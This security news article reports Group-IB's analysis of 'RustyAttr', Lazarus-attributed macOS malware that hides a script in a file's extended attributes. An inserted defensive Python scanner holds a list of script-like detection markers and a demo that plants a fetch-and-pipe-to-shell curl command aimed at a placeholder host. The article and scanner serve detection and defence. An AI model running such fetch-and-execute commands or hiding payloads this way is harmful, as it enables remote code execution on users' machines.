
Hackers Leveraging Extended Attributes To Evade Detection In macOS Systems

Researchers at Group-IB have discovered a novel technique in which a threat actor hides malicious code inside extended attributes to evade detection on macOS devices.

Extended attributes are metadata that many file systems allow to be attached to files and directories. They let a file carry more information than the standard attributes such as permissions, timestamps, and size.

The closest previously documented technique dates from 2020, when the Bundlore adware concealed its payload in a file's resource fork, which it read through the special path `filename/..namedfork/rsrc`.

Group-IB attributes the samples to the Lazarus APT with medium confidence. Because only a small number of samples have been observed in the wild, the researchers could not confirm that this campaign had any victims.


Overview Of Execution Flow

The malware, dubbed "RustyAttr", is an application that Lazarus built with the Tauri framework.

Although Finder and Terminal do not display extended attributes directly, they can be listed and read with the `xattr` command-line utility.

According to the researchers, the threat actor defined a custom extended attribute named "test" on the malicious application.
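The following Python script is an added example, not Group-IB's tooling and not code from the page, showing what a defender can do with the same interface: enumerate a file's extended attributes and flag any whose name or contents look like a hidden payload. Everything in it is an assumption chosen for illustration rather than taken from the research: the allowlist of common Apple attribute names, the 4 KB size threshold, and the set of script-like byte markers. On Linux, Python's `os.listxattr`/`os.getxattr` expose user attributes with a `user.` prefix, which the script strips so the same logic applies to bare macOS attribute names; macOS Python builds lack these functions, where `xattr -l` is the practical equivalent. The script also plants a constructed attribute named `test` on a temporary file to show what a finding looks like.

```python
"""Hunt for suspicious extended attributes of the kind RustyAttr abuses.

Added example, not Group-IB's tooling. Assumptions (not from the research):
  - KNOWN_ATTRS is a hand-maintained sample of common Apple attribute names,
    not an exhaustive list;
  - a value over 4 KB, or one containing script-like markers, is flagged;
  - Linux "user.<name>" attributes are compared after stripping the prefix so
    the same rules apply to bare macOS names.
"""
import os
import sys
import tempfile

KNOWN_ATTRS = {
    "com.apple.quarantine",
    "com.apple.FinderInfo",
    "com.apple.ResourceFork",
    "com.apple.metadata:_kMDItemUserTags",
    "com.apple.metadata:kMDItemWhereFroms",
    "com.apple.lastuseddate#PS",
    "com.apple.macl",
    "com.apple.provenance",
    "com.apple.TextEncoding",
}

# Byte sequences that rarely appear in legitimate metadata but are common in
# dropped scripts. Heuristic, assumed here; tune for your environment.
SCRIPT_MARKERS = (b"#!", b"osascript", b"curl ", b"base64", b"/bin/sh", b"bash -c", b"eval(")
SIZE_THRESHOLD = 4096  # assumed; Apple attributes are typically small


def normalize(name):
    """Linux exposes user xattrs as 'user.<name>'; macOS uses the bare name."""
    return name[5:] if name.startswith("user.") else name


def classify_attr(name, value):
    """Return the reasons (name, value) looks suspicious; [] when it looks benign."""
    reasons = []
    n = normalize(name)
    if n not in KNOWN_ATTRS and not n.startswith("com.apple."):
        reasons.append(f"non-Apple attribute name {n!r}")
    if len(value) > SIZE_THRESHOLD:
        reasons.append(f"unusually large value ({len(value)} bytes)")
    if any(marker in value for marker in SCRIPT_MARKERS):
        reasons.append("value contains script-like content")
    return reasons


def scan_file(path):
    """Return {attr_name: [reasons]} for every suspicious attribute on path."""
    findings = {}
    try:
        names = os.listxattr(path)
    except (OSError, AttributeError):
        return findings  # filesystem or platform without an xattr API
    for name in names:
        try:
            value = os.getxattr(path, name)
        except OSError:
            continue
        reasons = classify_attr(name, value)
        if reasons:
            findings[name] = reasons
    return findings


def scan_tree(root):
    """Walk root and return {path: {attr_name: [reasons]}} for files with findings."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            found = scan_file(path)
            if found:
                results[path] = found
    return results


def demo():
    """Plant a constructed script in a custom 'test' attribute on a temp file and scan it.

    Returns the scan findings, or None when the platform or filesystem offers no
    xattr API (e.g. macOS Python builds, or tmpfs without user xattr support).
    """
    if not hasattr(os, "setxattr"):
        return None
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b"decoy")
        path = f.name
    try:
        # Constructed payload; example.invalid is a reserved, non-resolving domain.
        os.setxattr(path, "user.test", b"#!/bin/sh\ncurl -s http://example.invalid/p | sh\n")
    except OSError:
        os.unlink(path)
        return None
    try:
        return scan_file(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    roots = sys.argv[1:] or ["/Applications"]
    for root in roots:
        for path, attrs in scan_tree(root).items():
            for name, reasons in attrs.items():
                print(f"{path}: {name}: {'; '.join(reasons)}")
```

Run it with one or more directories as arguments to hunt for files carrying attributes outside the Apple namespace or holding script-like content; the name check alone would have surfaced an attribute called "test", and the content check catches payloads parked under a plausible-looking name.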

[Figure: Execution flow of the RustyAttr malware]

Tauri is a framework for building lightweight desktop applications with a web-based frontend (HTML, CSS, and JavaScript) and a backend written in Rust.

The application retrieves the malicious script from the extended attribute and executes it.

The researchers identified two kinds of decoy. The first actually retrieves a PDF from filedn[.]com, a file hosting service: an "Investment Decision-Making Questionnaire" containing questions about game project development and funding. The second simply displays a dialog box reading "This app does not support this version."

[Figure: Decoy PDF downloaded and opened]

When the Tauri application runs, it uses a WebView to render an HTML page; the threat actor used a random template downloaded from the internet.

However, the researchers observed that these pages also load a suspicious JavaScript file named "preload.js".

[Figure: preload.js]

Tauri's `invoke` function is an Application Programming Interface (API) that bridges the frontend (JavaScript) and the backend (Rust): it lets the frontend call Rust functions, pass arguments, and receive data back.

“At the time of our analysis, the files are fully undetected on VirusTotal, likely due to the fact that the malicious components are concealed within the attributes,” the researchers said.

Recommendation

  • Be wary of prompts to download, open, or execute files.
  • Never disable macOS Gatekeeper or allow apps from unidentified developers.
  • Stay vigilant: these samples were undetected by VirusTotal engines at the time of analysis, so protection cannot rely on signature-based detection alone.


Guru Baran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
